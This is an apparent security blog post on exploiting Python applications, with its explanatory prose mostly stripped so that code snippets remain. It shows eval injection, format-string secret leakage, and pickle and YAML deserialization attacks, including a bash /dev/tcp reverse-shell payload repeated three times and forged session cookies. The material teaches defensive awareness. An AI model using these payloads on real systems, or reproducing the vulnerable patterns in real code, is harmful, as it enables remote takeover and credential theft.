Hacking Python Applications

And how attackers exploit common programming pitfalls to gain control

Vickie Li
Vickie Li
Nov 15, 2019 · 7 min read

Exploiting dangerous functions: eval(), exec() and input()

Eval()

def addition(a, b):
return eval("%s + %s" % (a, b))
result = addition(request.json['a'], request.json['b'])
print("The result is %d." % result)
{"a":"1", "b":"2"}
{"a":"__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')#", "b":"2"}

Exec()

def addition(a, b):
return exec("%s + %s" % (a, b))
addition(request.json['a'], request.json['b'])

Input()

user_pass = get_user_pass("admin")
if user_pass == input(“Please enter your password”):
login()
else:
print "Password is incorrect!"
if user_pass == user_pass: // this will evaluate as true
if user_pass == get_user_pass("admin"): 
// this will also evaluate as true

Exploiting string formatting

CONFIG = {
"API_KEY": "771df488714111d39138eb60df756e6b"
// some program secrets that users should not be able to read
}
class Person(object):
def __init__(self, name):
self.name = name
def print_nametag(format_string, person):
return format_string.format(person=person)
new_person = Person(“Vickie”)
print_nametag(input("Please format your nametag!"), person)
print_nametag("Hi, my name is {person.name}. I am a {person.__class__.__name__}.", new_person)
“Hi, my name is Vickie. I am a Person.”
print_nametag("{person.__init__.__globals__[CONFIG][API_KEY]}", new_person)

Exploiting Pickle deserialization

Image for post
Image for post
Yummmmmmm. Photo by chuttersnap on Unsplash
class Person:
def __init__(self, name):
self.name = name

new_person = Person("Vickie")
print(pickle.dumps(new_person))
b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\x06\x00\x00\x00Vickieq\x04sb.'
print(pickle.loads(b’\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\x06\x00\x00\x00Vickieq\x04sb.’).name)
// -> prints "Vickie"

Authentication bypass

class Person:
def __init__(self, name):
self.name = name

new_person = Person("Vickie")
session_cookie = base64_encode(pickle.dumps(new_person))
class Person:
def __init__(self, name):
self.name = name

new_person = Person("Admin")
session_cookie = base64.b64encode(pickle.dumps(new_person))

Code Execution

(callable object that will be called to instantiate the new object, 
a tuple of arguments for that callable object)
class Malicious:
def __reduce__(self):
return (os.system, ('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1',))

fake_object = Malicious()
session_cookie = base64.b64encode(pickle.dumps(fake_object))
os.system(‘bash -i >& /dev/tcp/10.0.0.1/8080 0>&1’)

Exploiting YAML parsing

class Person:
def __init__(self, name):
self.name = name

new_person = Person("Vickie")
print(yaml.dump(new_person))
!!python/object:__main__.Person {name: Vickie}
yaml.load(YAML_FILE)

Authentication bypass

class Person:
def __init__(self, name):
self.name = name

new_person = Person("Vickie")
session_cookie = base64_encode(yaml.dump(new_person))
class Person:
def __init__(self, name):
self.name = name

new_person = Person("Admin")
session_cookie = base64_encode(yaml.dump(new_person))

Code Execution

!!python/object/apply:os.system ["bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"]

Other dangerous when developing in Python

The Startup

Get smarter at building your thing. Join The Startup’s +776K followers.

Vickie Li

Written by

Vickie Li

Professional investigator of nerdy stuff. Hacks and secures. Creates god awful infographics. https://twitter.com/vickieli7

The Startup

Get smarter at building your thing. Follow to join The Startup’s +8 million monthly readers & +776K followers.

Vickie Li

Written by

Vickie Li

Professional investigator of nerdy stuff. Hacks and secures. Creates god awful infographics. https://twitter.com/vickieli7

The Startup

Get smarter at building your thing. Follow to join The Startup’s +8 million monthly readers & +776K followers.

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store